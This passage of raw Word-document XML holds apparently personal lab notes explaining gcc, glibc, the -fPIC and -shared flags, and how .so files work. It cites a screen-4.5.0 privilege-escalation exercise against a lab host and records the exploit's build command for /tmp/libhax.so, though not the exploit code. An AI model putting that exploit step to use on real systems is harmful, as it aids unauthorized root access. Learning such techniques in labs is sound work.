      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc compiles it, but printf isn’t in your code — it’s in glibc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003638">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1230"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So gcc arranges for your binary to depend on glibc at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003639">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1230"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you say -static, gcc bundles glibc inside your executable; if you don’t, gcc leaves an instruction that says "find glibc at runtime as a shared library".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000363A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1230"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Think of gcc as the cook and glibc as the ingredient library of standard recipes that every dish uses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000363B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000363C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Think of gcc as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cook</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and glibc as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ingredient library</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of standard recipes that every dish uses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000363D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000363E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u9m3q2ptsoeg" w:id="485"/>
      <w:bookmarkEnd w:id="485"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fPIC and -shared</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000363F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003640">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We first saw this flag used when creating .so files the screen-4.5.0 priv esc for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-A .143 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003641">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003642">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We ran these two:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003643">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="958"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003644">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003645">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fPIC</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -shared</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are both seen very often together, and are used for making .so files out of the .c file. And -ldl is also often included too</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003646">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003647">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. -shared</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003648">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Instructs the linker: "don’t make an executable with main(), make a shared object instead."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003649">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output is .so (ELF type ET_DYN) instead of an ELF executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000364A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Without -shared, gcc tries to link an executable and will complain about "undefined reference to main" if you don’t provide one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000364B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So: mandatory for .so builds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000364C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000364D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. -fPIC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000364E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="773"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tells the compiler: "generate position-independent code."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000364F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="773"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shared libs can be mapped at different addresses in different processes. PIC makes this safe: the code has no absolute addresses baked in, so the dynamic loader can relocate it easily.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003650">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="773"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On x86-64 Linux, PIC is essentially required for shared libs. Some non-PIC code can still be linked into a shared object, but it may cause text relocations (less efficient, sometimes blocked by hardened kernels).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003651">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="773"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So: best practice (and in practice, required) for .so builds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003652">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003653">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(and add -ldl if you call dlopen/dlsym).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003654">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pozsmkr7k4bt" w:id="486"/>
      <w:bookmarkEnd w:id="486"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.so files</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003655">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003656">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.so </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">files?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003657">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1381"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> files are like</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .dll</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> files but for Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003658">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1381"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the case of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">glibc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it contains the dependencies of C executables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003659">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000365A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For glibc, the key</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .so file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000365B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/lib/x86_64-linux-gnu/libc.so.6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000365C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That file is the shared glibc library.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000365D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000365E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How they work:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000365F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you build dynamically, gcc writes into your binary: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Gungsuh" w:cs="Gungsuh" w:eastAsia="Gungsuh" w:hAnsi="Gungsuh"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"I need libc.so.6 version ≥ 2.33".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003660">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">At runtime, the dynamic linker (ld-linux-x86-64.so.2) looks up .so files, loads them into memory, and resolves all missing functions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003661">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your code’s call to functions like printf ends up jumping into </w:t>
      </w:r>
